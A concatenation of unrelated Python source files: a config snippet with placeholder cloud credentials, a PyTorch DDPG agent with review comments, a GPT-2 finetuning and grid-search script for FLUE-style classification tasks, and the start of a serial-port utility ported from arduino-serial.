ACM_SNAPSHOT_DIR = os.path.join(APP_BIN_PATH, 'acm-snapshot')
ACM_ENDPOINT = 'acm.aliyun.com'
# --- AliACM Access Token BEGIN ---
# Placeholders only; real credentials are expected to be filled in locally.
ACM_NAMESPACE = 'Leave your namespace here.'
ACM_ACCESS_KEY = 'Leave your access key here.'
ACM_SECRET_KEY = 'Leave your secret key.'
# --- AliACM Access Token END ---
'''
Validate Code
'''
SOBOOKS_VALIDATE_CODE = '512512'
# ----------
# DO NOT MODIFY THE INFORMATION BELOW
# ----------
BAIDU_COOKIE_PATH = os.path.join(APP_BIN_PATH, 'baidu-config.json')
DOUBAN_COOKIE_PATH = os.path.join(APP_BIN_PATH, 'douban-config.json')
|
# ddpg_agent.py
import torch
import torch.optim as opt
from torch.autograd import Variable
from torch import FloatTensor as FT
import agent
from replay_buffer import ExperienceReplay
import numpy as np
from torch.utils.serialization import load_lua
import importlib.util
# import model_defs.ddpg_models.mountain_cart.actor as actor
# import model_defs.ddpg_models.mountain_cart.critic as critic
import random
#Default hyperparameter values
REPLAY_BUFFER_SIZE = 1000000   # max transitions held in experience replay
DISCOUNT_FACTOR = 1            # gamma; 1 = undiscounted returns
LEARNING_RATE_CRITIC = 0.01
LEARNING_RATE_ACTOR = 0.01
ACTOR_ITER_COUNT = 1000        # actor gradient steps per train() call
CRITIC_ITER_COUNT = 1000       # critic gradient steps per train() call
BATCH_SIZE = 100               # minibatch size sampled from the buffer
EPSILON = 0.01                 # NOTE(review): unused -- DDPGAgent.__init__ hard-codes epsilon = 0.35
FREEZE_TARGET_STEPS = 1        # train() calls between target-critic syncs
class DDPGAgent(agent.Agent):
    """An agent that implements the DDPG algorithm.

    An agent that implements the deep deterministic
    policy gradient algorithm for continuous control.
    A description of the algorithm can be found at
    https://arxiv.org/pdf/1509.02971.pdf.
    The agent stores a replay buffer along with
    two models of the data, an actor and a critic.

    Attributes:
        actor: The actor model that takes a state
            and returns a new action.
        critic: The critic model that takes a state
            and an action and returns the expected
            reward.
        replay_buffer: The DDPGAgent replay buffer.
    """
    # NOTE(review): the triple-quoted block below is a bare string literal,
    # i.e. dead code -- property accessors "commented out" by wrapping them
    # in a string.  As written they would recurse infinitely if re-enabled.
    """
    @property
    def actor(self):
        return self.actor
    @property
    def critic(self):
        return self.critic
    @property
    def replay_buffer(self):
        return self.replay_buffer
    """
    def __init__(self,
                 model_def,
                 state_size = 1,
                 action_size = 1,
                 buffer_size = REPLAY_BUFFER_SIZE,
                 gamma = DISCOUNT_FACTOR,
                 actor_alpha = LEARNING_RATE_ACTOR,
                 critic_alpha = LEARNING_RATE_CRITIC,
                 actor_iter_count = ACTOR_ITER_COUNT,
                 critic_iter_count = CRITIC_ITER_COUNT,
                 freeze_target_steps = FREEZE_TARGET_STEPS,
                 batch_size = BATCH_SIZE,
                 use_cuda = True):
        """Constructor for the DDPG_agent.

        Args:
            model_def: path to a python source file defining ``Actor`` and
                ``Critic`` model classes (loaded via importlib).
            state_size: dimensionality of the state vector.
            action_size: dimensionality of the action vector.
            buffer_size: size of the replay buffer.
            gamma: the discount factor.
            actor_alpha: learning rate for the actor optimizer.
            critic_alpha: learning rate for the critic optimizer.
            actor_iter_count: actor gradient steps per train() call.
            critic_iter_count: critic gradient steps per train() call.
            freeze_target_steps: train() calls between target-critic syncs.
            batch_size: minibatch size sampled from the replay buffer.
            use_cuda: move models/tensors to the GPU when True.
        Returns:
            A DDPGAgent object
        """
        self._use_cuda = use_cuda
        #Initialize experience replay buffer
        self.replay_buffer = ExperienceReplay(state_size, action_size, buffer_size)
        #TODO
        #initialize parameters
        self.epsilon = 0.35  # exploration rate; decays each train() call (module-level EPSILON is unused)
        self._actor_alpha = actor_alpha
        self._critic_alpha = critic_alpha
        self._actor_iter_count = actor_iter_count
        self._critic_iter_count = critic_iter_count
        self._freeze_target_steps = freeze_target_steps
        self._freeze_target_step = 0  # counter toward the next target-critic sync
        self._gamma = gamma
        self._batch_size = batch_size
        self._state_size = state_size
        self._action_size = action_size
        # import the specified model_defs (Actor/Critic classes) from the
        # user-supplied python file
        spec = importlib.util.spec_from_file_location("model_def", model_def)
        ModelDefModule = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(ModelDefModule)
        self.ActorModuleClass = ModelDefModule.Actor
        self.CriticModuleClass = ModelDefModule.Critic
        #initialize models
        self.load_models()
        #Move weights and bufffers to the gpu if possible
        if self._use_cuda:
            self.actor = self.actor.cuda()
            self.critic = self.critic.cuda()
            self._target_critic = self._target_critic.cuda()
        #Initialize optimizers
        self._actor_optimizer = opt.Adam(self.actor.parameters(), lr=self._actor_alpha)
        self._critic_optimizer = opt.Adam(self.critic.parameters(), lr=self._critic_alpha)
        # if self._use_cuda:
        #     self._actor_optimizer = self._actor_optimizer.cuda()
        #     self._critic_optimizer = self._critic_optimizer.cuda()
    def train(self):
        """Trains the agent for a bit.

        Runs ``critic_iter_count`` critic updates followed by
        ``actor_iter_count`` actor updates (each on a freshly sampled
        minibatch), then possibly syncs the frozen target critic.
        Args:
            None
        Returns:
            None
        """
        self.epsilon = self.epsilon * 0.99995  # slow multiplicative exploration decay
        #update_critic
        for i in range(self._critic_iter_count):
            s_t, a_t, r_t, s_t1, done = self.replay_buffer.batch_sample(self._batch_size)
            done = self.upcast(done)
            s_t = self.upcast(s_t)
            a_t = self.upcast(a_t)
            s_t1 = self.upcast(s_t1)
            r_t = self.upcast(r_t)
            a_t1 = self.actor.forward(s_t1)
            # One-step TD target; (1-done) zeroes the bootstrap term on
            # terminal transitions.
            critic_target = r_t + self._gamma*(1-done)*self._target_critic.forward(s_t1,a_t1)
            td_error = (self.critic.forward(s_t,a_t)-critic_target)**2
            #preform one optimization update
            self._critic_optimizer.zero_grad()
            mean_td_error = torch.mean(td_error)
            mean_td_error.backward()
            self._critic_optimizer.step()
        #update_actor
        for i in range(self._actor_iter_count):
            s_t, a_t, r_t, s_t1, done = self.replay_buffer.batch_sample(self._batch_size)
            done = self.upcast(done)
            s_t = self.upcast(s_t)
            a_t = self.upcast(a_t)
            s_t1 = self.upcast(s_t1)
            r_t = self.upcast(r_t)
            a_t1 = self.actor.forward(s_t1)
            # NOTE(review): the actor loss is evaluated on the *next* states
            # (s_t1); published DDPG uses the current states s_t here --
            # confirm this is intentional.
            expected_reward = self.critic.forward(s_t1,a_t1)
            total_loss = -1*expected_reward  # negate: gradient ascent on expected reward
            mean_loss = torch.mean(total_loss)
            #print('LOSS:', mean_loss, 'Eps', self.epsilon)
            #preform one optimization update
            self._actor_optimizer.zero_grad()
            mean_loss.backward()
            self._actor_optimizer.step()
        # TODO: Freeze less often
        self._freeze_target_step += 1
        if (self._freeze_target_step >= self._freeze_target_steps):
            self._target_critic.load_state_dict(self.critic.state_dict())
            self._freeze_target_step = 0
    def get_next_action(self,
                        cur_state,
                        agent_id=None,
                        is_test=False):
        """Get the next action from the agent.

        Takes the current state and returns the policy's action, storing
        the (state, action) pair in the replay buffer except in test mode.
        Args:
            cur_state: The current state of the environment
            agent_id: unused; kept for interface compatibility
            is_test: when True, act without exploration noise and do not
                record the transition
        Returns:
            The next action that the agent will carry out
            given the current state
        """
        cur_action = None
        cur_state_up = self.upcast(np.expand_dims(cur_state,axis=0))  # add a batch dimension
        if is_test:
            # Greedy action; nothing recorded in the replay buffer.
            a = self.actor.forward(cur_state_up)
            cur_action = a.data.cpu().numpy()
        elif random.random() < self.epsilon:
            # Exploration: policy action plus scaled Gaussian noise.
            a = self.actor.forward(cur_state_up)
            cur_action = a.data.cpu().numpy()
            cur_action += 0.3*np.expand_dims(np.random.randn(self._action_size),axis=0)
            self.replay_buffer.put_act(cur_state,cur_action)
        else:
            # Exploitation: raw policy action.
            a = self.actor.forward(cur_state_up)
            cur_action = a.data.cpu().numpy()
            self.replay_buffer.put_act(cur_state,cur_action)
        return cur_action
    def log_reward(self,reward,is_done):
        """Record the reward (and episode-end flag) for the last stored action."""
        self.replay_buffer.put_rew(reward,is_done)
    def save_models(self, location=None):
        """Save the model to a given location
        Args:
            Location: where to save the model
        Returns:
            None
        """
        #Return all weights and buffers to the cpu
        self.actor.cpu()
        self.critic.cpu()
        # NOTE(review): the target critic is not included in the checkpoint;
        # after a reload it is only re-synced at the next freeze step.
        weight_dict = {'actor': self.actor.state_dict(), 'critic': self.critic.state_dict()}
        #Save both models
        torch.save(weight_dict, location)
        #Move weights and bufffers to the gpu if possible
        if self._use_cuda:
            self.actor = self.actor.cuda()
            self.critic = self.critic.cuda()
            self._target_critic = self._target_critic.cuda()
    def load_models(self, location=None):
        # TODO: Make it actually do what it says
        #TODO: Remove hard coding of data
        """Loads the models from given location
        Args:
            Location: from where to load the model
        Returns:
            None
        """
        self.actor = self.ActorModuleClass(self._state_size,self._action_size) #dill.load(actor_file)
        self.critic = self.CriticModuleClass(self._state_size + self._action_size, 1)#dill.load(critic_file)
        self._target_critic = self.CriticModuleClass(self._state_size + self._action_size,1)#dill.load(critic_file)
        if location is not None:
            weight_dict = torch.load(location)
            self.actor.load_state_dict(weight_dict['actor'])
            self.critic.load_state_dict(weight_dict['critic'])
            # NOTE(review): the target critic keeps freshly initialized
            # weights here; it likely should also load weight_dict['critic']
            # -- confirm.
    def upcast(self, x):
        ''' Upcasts x to a torch Variable (float32, on the GPU when enabled).
        '''
        #TODO: Where does this go?
        if self._use_cuda:
            return Variable(FT(x.astype(np.float32))).cuda()
        else:
            return Variable(FT(x.astype(np.float32)))
|
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning the library models for sequence classification on GLUE."""
# You can also adapt this script on your own text classification task. Pointers for this are left as comments.
import logging
import os
import random
import sys
from dataclasses import dataclass, field
from typing import Optional
import itertools
import collections
import tensorflow as tf
import datetime
import numpy as np
import datasets as hf_datasets
from datasets import load_dataset, load_metric
import transformers
from transformers import (
AutoConfig,
AutoModelForSequenceClassification,
AutoTokenizer,
GPT2Tokenizer,
GPT2Config,
GPT2ForSequenceClassification,
EvalPrediction,
HfArgumentParser,
PretrainedConfig,
Trainer,
TrainingArguments,
default_data_collator,
set_seed,
)
# from transformers.trainer_utils import is_main_process
# import pyarrow.csv
from datasets import Features, ClassLabel, Value
# Maps each supported task to the dataset column(s) holding its input text;
# the second entry is None for single-sentence tasks.
task_to_keys = {
    "cls": ("sentence", None),
    "pawsx": ("sentence1", "sentence2"),
    "xnli": ("premise", "hypothesis"),
    "wsd": ("sentence", None),
}
# Maps each task to the GLUE metric configuration reused for it.
task_to_metrics = {
    "cls": "sst2",
    "pawsx": "mrpc",
    "xnli": "mnli",
    "wsd": "",
}
# One grid-search run's outcome.  (The stray comma after 'seed' is tolerated:
# namedtuple accepts comma- or whitespace-separated field names.)
DevResult = collections.namedtuple('DevResult', 'seed, learning_rate batch_size eval_metric_1 eval_metric_2 eval_loss')
logger = logging.getLogger(__name__)
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.

    Using `HfArgumentParser` we can turn this class
    into argparse arguments to be able to specify them on
    the command line.
    """
    task_name: Optional[str] = field(
        default=None,
        metadata={"help": "The name of the task to train on: " + ", ".join(task_to_keys.keys())},
    )
    n_seeds: Optional[int] = field(
        default=5,
        metadata={"help": "Number of runs (random seeds) for tasks with small training sets."},
    )
    max_seq_length: int = field(
        default=128,
        metadata={
            "help": "The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded."
        },
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached preprocessed datasets or not."}
    )
    pad_to_max_length: bool = field(
        default=True,
        metadata={
            "help": "Whether to pad all samples to `max_seq_length`. "
            "If False, will pad the samples dynamically when batching to the maximum length in the batch."
        },
    )
    train_file: Optional[str] = field(
        default=None, metadata={"help": "A csv or a json file containing the training data."}
    )
    validation_file: Optional[str] = field(
        default=None, metadata={"help": "A csv or a json file containing the validation data."}
    )
    predict_file: Optional[str] = field(
        default=None, metadata={"help": "A csv or a json file containing the test data."}
    )
    # BUGFIX: the two help strings below were copy-pasted from predict_file
    # and wrongly described these fields as data files.
    learning_rates: Optional[str] = field(
        default=None, metadata={"help": "Slash-separated learning rates to grid-search, e.g. '1e-5/3e-5/5e-5'."}
    )
    batch_sizes: Optional[str] = field(
        default=None, metadata={"help": "Slash-separated batch sizes to grid-search, e.g. '16/32'."}
    )
    def __post_init__(self):
        # Validate: either a known task name (normalized to lowercase) or an
        # explicit pair of training/validation files with csv/json extensions.
        if self.task_name is not None:
            self.task_name = self.task_name.lower()
            if self.task_name not in task_to_keys.keys():
                raise ValueError("Unknown task, you should pick one in " + ",".join(task_to_keys.keys()))
        elif self.train_file is None or self.validation_file is None:
            raise ValueError("Need either a GLUE task or a training/validation file.")
        else:
            extension = self.train_file.split(".")[-1]
            assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
            extension = self.validation_file.split(".")[-1]
            assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
    """
    # Required: checkpoint path or hub identifier to start from.
    model_name_or_path: str = field(
        metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
    )
    # Optional overrides; when None these fall back to model_name_or_path.
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    cache_dir: Optional[str] = field(
        default=None,
        metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
    )
    use_fast_tokenizer: bool = field(
        default=True,
        metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
    )
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if True else logging.WARN, # is_main_process(training_args.local_rank)
)
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Set the verbosity to info of the Transformers logger (on main process only):
if True: # is_main_process(training_args.local_rank)
transformers.utils.logging.set_verbosity_info()
transformers.utils.logging.enable_default_handler()
# transformers.utils.logging.enable_explicit_format()
logger.info(f"Training/evaluation parameters {training_args}")
hyper_parameters_gridsearch = {
'learning_rate': [float(lr) for lr in data_args.learning_rates.split('/')],
'batch_size': [float(lr) for lr in data_args.batch_sizes.split('/')],
}
hyper_parameters_values = [p for p in itertools.product(*[*hyper_parameters_gridsearch.values()])]
# Set seed before initializing model.
# set_seed(training_args.seed)
if data_args.task_name in ['pawsx', 'xnli', 'wsd']:
n_seeds_ = 1
else:
n_seeds_ = data_args.n_seeds
eval_results = {}
test_results = {}
for hyperparameters in hyper_parameters_values:
for seed in range(n_seeds_):
training_args.learning_rate = hyperparameters[0]
training_args.per_device_train_batch_size = int(hyperparameters[1])
print('\nstart hyper-parameters search with : lr: {} and batch_size: {} without seed {}'.format(
training_args.learning_rate, training_args.per_device_train_batch_size, seed))
def split_sentences(example):
example['sentence2'] = example['sentence1'].split('\t')[1]
example['sentence1'] = example['sentence1'].split('\t')[0]
return example
def cast_labels(example):
example['premise'] = example['premise'].strip('\"')
example['label'] = example['hypothesis']
example['hypothesis'] = example['premise'].split('\t')[1]
example['premise'] = example['premise'].split('\t')[0]
if example['label'] == "entailment":
example['label'] = 0
elif example['label'] == "neutral":
example['label'] = 1
elif example['label'] == "contradiction":
example['label'] = 2
return example
if data_args.task_name == "pawsx":
datasets = load_dataset("csv", data_files={"train": data_args.train_file,
"validation": data_args.validation_file,
"test": data_args.predict_file},
column_names=['label', 'idx1', 'idx2', 'sentence1', 'sentence2'],
skiprows=0, sep='\t')
# datasets = hf_datasets.load_from_disk(data_args.train_file)
datasets = datasets.map(split_sentences)
datasets.cast_(Features({'label': ClassLabel(num_classes=2),
'idx1': Value(dtype='int64'),
'idx2': Value(dtype='int64'),
'sentence1': Value(dtype='string'),
'sentence2': Value(dtype='string'),
}))
elif data_args.task_name == "xnli":
datasets = load_dataset("csv", data_files={"train": data_args.train_file,
"validation": data_args.validation_file,
"test": data_args.predict_file},
column_names=['premise', 'hypothesis', 'label'], skiprows=1, sep='\t')
# datasets = hf_datasets.load_from_disk(data_args.train_file)
datasets = datasets.map(cast_labels)
datasets.cast_(Features({'premise': Value(dtype='string'),
'hypothesis': Value(dtype='string'),
'label': ClassLabel(names=['entailment', 'neutral', 'contradiction']),
}))
elif data_args.task_name == "cls":
datasets = load_dataset("csv", data_files={"train": data_args.train_file,
"validation": data_args.validation_file,
"test": data_args.predict_file},
column_names=['sentence', 'label'], skiprows=1, sep='\t')
# datasets = hf_datasets.load_from_disk(data_args.train_file)
datasets.cast_(Features({'sentence': Value(dtype='string'),
'label': ClassLabel(num_classes=2),
}))
# Labels
if data_args.task_name is not None:
is_regression = data_args.task_name == "stsb"
if not is_regression:
label_list = datasets["train"].features["label"].names
num_labels = len(label_list)
else:
num_labels = 1
else:
# Trying to have good defaults here, don't hesitate to tweak to your needs.
is_regression = datasets["train"].features["label"].dtype in ["float32", "float64"]
if is_regression:
num_labels = 1
else:
# A useful fast method:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique
label_list = datasets["train"].unique("label")
label_list.sort() # Let's sort it for determinism
num_labels = len(label_list)
# Load pretrained model and tokenizer
#
# In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
num_labels=num_labels,
finetuning_task=task_to_metrics[data_args.task_name],
output_attention=False,
output_hidden_states=False,
use_cache=False
# cache_dir=model_args.cache_dir,
)
tokenizer = GPT2Tokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
use_fast=model_args.use_fast_tokenizer,
)
# if tokenizer.__class__.__name__ == 'GPT2TokenizerFast':
tokenizer.add_special_tokens({
"eos_token": "</s>",
"bos_token": "<s>",
"unk_token": "<unk>",
"pad_token": "<pad>",
"mask_token": "<mask>"
})
# config = GPT2Config(
# vocab_size=tokenizer.vocab_size,
# bos_token_id=tokenizer.bos_token_id,
# eos_token_id=tokenizer.bos_token_id,
# n_embd=120, # 1200, 1536
# n_layer=1, # 36, 40
# n_head=3, # 12, 16
# output_attentions=False,
# output_hidden_states=False,
# use_cache=False,
# num_labels=num_labels,
# finetuning_task=task_to_metrics[data_args.task_name],
# )
config.pad_token_id = tokenizer.pad_token_id
# model = GPT2ForSequenceClassification(config)
model = GPT2ForSequenceClassification.from_pretrained( # AutoModelForSequenceClassification
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
# cache_dir=model_args.cache_dir,
)
model.train()
# Preprocessing the datasets
if data_args.task_name is not None:
sentence1_key, sentence2_key = task_to_keys[data_args.task_name]
else:
# Again, we try to have some nice defaults but don't hesitate to tweak to your use case.
non_label_column_names = [name for name in datasets["train"].column_names if name != "label"]
if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", "sentence2"
else:
if len(non_label_column_names) >= 2:
sentence1_key, sentence2_key = non_label_column_names[:2]
else:
sentence1_key, sentence2_key = non_label_column_names[0], None
# Padding strategy
if data_args.pad_to_max_length:
padding = "max_length"
max_length = data_args.max_seq_length
else:
# We will pad later, dynamically at batch creation, to the max sequence length in each batch
padding = False
max_length = None
# Some models have set the order of the labels to use, so let's make sure we do use it.
label_to_id = None
if (
model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id
and data_args.task_name is not None
and is_regression
):
# Some have all caps in their config, some don't.
label_name_to_id = {k.lower(): v for k, v in model.config.label2id.items()}
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
label_to_id = {i: label_name_to_id[label_list[i]] for i in range(num_labels)}
else:
logger.warn(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
"\nIgnoring the model labels as a result.",
)
elif data_args.task_name is None:
label_to_id = {v: i for i, v in enumerate(label_list)}
            def preprocess_function(examples):
                """Tokenize a batch of examples.

                Closure over ``tokenizer``, ``padding``, ``max_length``,
                ``sentence1_key``/``sentence2_key`` and ``label_to_id`` chosen
                above.  ``examples`` is a batched column dict (this function is
                passed to ``datasets.map(..., batched=True)``); returns the
                tokenizer output, with labels remapped to ids when a
                ``label_to_id`` table was built.
                """
                # Tokenize the texts
                # Single-sentence tasks pass a 1-tuple; pair tasks pass both columns.
                args = (
                    (examples[sentence1_key],) if sentence2_key is None else (
                        examples[sentence1_key], examples[sentence2_key])
                ) # examples[sentence2_key]
                result = tokenizer(*args, padding=padding, max_length=max_length, truncation=True)
                # Map labels to IDs (not necessary for GLUE tasks)
                if label_to_id is not None and "label" in examples:
                    result["label"] = [label_to_id[l] for l in examples["label"]]
                return result
datasets = datasets.map(preprocess_function, batched=True,
load_from_cache_file=not data_args.overwrite_cache)
train_dataset = datasets["train"]
eval_dataset = datasets["validation_matched" if data_args.task_name == "mnli" else "validation"]
if data_args.task_name is not None:
test_dataset = datasets["test_matched" if data_args.task_name == "mnli" else "test"]
# Log a few random samples from the training set:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
# Get the metric function
if data_args.task_name is not None:
metric = load_metric("/content/glue_metrics.py", task_to_metrics[data_args.task_name])
# TODO: When datasets metrics include regular accuracy, make an else here and remove special branch from
# compute_metrics
# You can define your custom compute_metrics function. It takes an `EvalPrediction` object (a namedtuple with a
# predictions and label_ids field) and has to return a dictionary string to float.
            def compute_metrics(p: EvalPrediction):
                """Compute evaluation metrics from an ``EvalPrediction``.

                Uses the task ``metric`` loaded above when ``task_name`` is
                set; otherwise falls back to MSE (regression) or plain
                accuracy (classification).
                """
                # Some models return a tuple (logits, extras); keep the logits.
                preds = p.predictions[0] if isinstance(p.predictions, tuple) else p.predictions
                # argmax over classes for classification; squeeze for regression.
                preds = np.squeeze(preds) if is_regression else np.argmax(preds, axis=1)
                if data_args.task_name is not None:
                    result = metric.compute(predictions=preds, references=p.label_ids)
                    if len(result) > 1:
                        # Summarize multi-metric tasks with their mean.
                        result["combined_score"] = np.mean(list(result.values())).item()
                    return result
                elif is_regression:
                    return {"mse": ((preds - p.label_ids) ** 2).mean().item()}
                else:
                    return {"accuracy": (preds == p.label_ids).astype(np.float32).mean().item()}
if not tf.io.gfile.exists(
os.path.join(training_args.output_dir, model_args.model_name_or_path.split('/')[-1])):
tf.io.gfile.makedirs(
os.path.join(training_args.output_dir, model_args.model_name_or_path.split('/')[-1]))
tf.io.gfile.makedirs(
os.path.join(training_args.output_dir, model_args.model_name_or_path.split('/')[-1], 'flue'))
tf.io.gfile.makedirs(
os.path.join(training_args.output_dir, model_args.model_name_or_path.split('/')[-1], 'flue', data_args.task_name))
output_dir = '{}/{}/flue/{}/{}_{}_{}'.format(
training_args.output_dir,
model_args.model_name_or_path.split('/')[-1],
data_args.task_name,
str(seed),
str(training_args.learning_rate),
str(training_args.train_batch_size))
training_args.output_dir = output_dir
training_args.save_steps = 10000
training_args.save_total_limit = 2
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset if training_args.do_eval else None,
compute_metrics=compute_metrics,
tokenizer=tokenizer,
# Data collator will default to DataCollatorWithPadding, so we change it if we already did the padding.
data_collator=default_data_collator if data_args.pad_to_max_length else None,
)
# Training
if training_args.do_train:
trainer.train()
# trainer.train(
# model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None
# )
trainer.save_model() # Saves the tokenizer too for easy upload
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
eval_result = trainer.evaluate(eval_dataset=eval_dataset)
test_result = trainer.evaluate(eval_dataset=test_dataset)
dev_metric_1 = eval_result['eval_accuracy']
test_metric_1 = test_result['eval_accuracy']
if data_args.task_name in ['WSD']:
dev_metric_2 = eval_result['f1']
test_metric_2 = test_result['f1']
else:
dev_metric_2 = 0
test_metric_2 = 0
eval_results[output_dir] = DevResult(seed, training_args.learning_rate, training_args.train_batch_size,
dev_metric_1, dev_metric_2,
eval_result['eval_loss'])
test_results[output_dir] = DevResult(seed, training_args.learning_rate, training_args.train_batch_size,
test_metric_1, test_metric_2,
test_result['eval_loss'])
if trainer.is_world_process_zero():
logger.info(f"***** Eval results {data_args.task_name} *****")
for key, value in eval_result.items():
logger.info(f" {key} = {value}")
if training_args.do_predict:
logger.info("*** Test ***")
best_result = -1
for k, v in eval_results.items():
if v.eval_metric_1 > best_result:
best_result = v.eval_metric_1
best_result_2 = v.eval_metric_2
best_estimator_output_dir = k
best_estimator_learning_rate = v.learning_rate
best_estimator_train_batch_size = v.batch_size
best_seed = v.seed
same_seed_results_1 = []
same_seed_results_2 = []
for k, v in eval_results.items():
if (best_estimator_learning_rate == v.learning_rate) and (best_estimator_train_batch_size == v.batch_size):
same_seed_results_1.append(v.eval_metric_1)
same_seed_results_2.append(v.eval_metric_2)
print('\nhyper-parameters: seed: {} lr: {} and batch size: {} saved in dir: {}'
.format(best_seed, best_estimator_learning_rate, best_estimator_train_batch_size,
best_estimator_output_dir))
print('\n best dev results 1: {}, avg: {}, std: {}, best dev results 2: {}, : avg: {}, std: {}'.format(
round(best_result * 100, 1), round(np.mean(same_seed_results_1) * 100, 1),
round(np.std(same_seed_results_1) * 100, 1),
round(best_result_2 * 100, 1),
round(np.mean(same_seed_results_2) * 100, 1), round(np.std(same_seed_results_2) * 100, 1)))
best_test_results = test_results[best_estimator_output_dir]
logger.info(f"***** Test results {data_args.task_name} *****")
logger.info(f" eval_metric_1 = {best_test_results.eval_metric_1}")
logger.info(f" eval_metric_2 = {best_test_results.eval_metric_2}")
print("***** Test results {} *****".format(data_args.task_name))
print(" eval_metric_1 = {}".format(best_test_results.eval_metric_1))
print(" eval_metric_2 = {}".format(best_test_results.eval_metric_2))
return eval_results
def _mp_fn(index):
    # For xla_spawn (TPUs)
    # ``index`` is presumably the process index supplied by xla_spawn — it is
    # intentionally unused; each spawned process just runs main().
    main()
if __name__ == "__main__":
    main()
|
#!/usr/bin/env python
#
# Copyright 2007 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
A port of Tod E. Kurt's arduino-serial.c.
<http://todbot.com/blog/2006/12/06/arduino-serial-c-code-to-talk-to-arduino/>
"""
import termios
import fcntl
import os
import sys
import time
import getopt
# Map from the numbers to the termios constants (which are pretty much
# the same numbers).
BPS_SYMS = {
    4800: termios.B4800,
    9600: termios.B9600,
    19200: termios.B19200,
    38400: termios.B38400,
    57600: termios.B57600,
    115200: termios.B115200
}
# Indices into the termios tuple.
IFLAG = 0
OFLAG = 1
CFLAG = 2
LFLAG = 3
ISPEED = 4
OSPEED = 5
CC = 6
def bps_to_termios_sym(bps):
    """Return the termios speed constant for the given baud rate.

    Raises KeyError (as before, so existing callers' handlers still work)
    but now with a message naming the offending rate and the supported ones.
    """
    try:
        return BPS_SYMS[bps]
    except KeyError:
        raise KeyError("unsupported baud rate %r; supported rates: %s"
                       % (bps, sorted(BPS_SYMS)))
class SerialPort:
    """Minimal raw serial-port wrapper built on ``os.open`` + ``termios``:
    8 data bits, no parity, 1 stop bit, no hardware or software flow control.

    NOTE(review): this module is Python 2 (see the ``print`` statements
    below).  Under Python 3 ``os.read`` returns ``bytes``, so the ``str``
    comparisons in ``read_until`` and ``chr()`` in ``write_byte`` would need
    porting — confirm before reuse.
    """
    def __init__(self, serialport, bps):
        """Takes the string name of the serial port
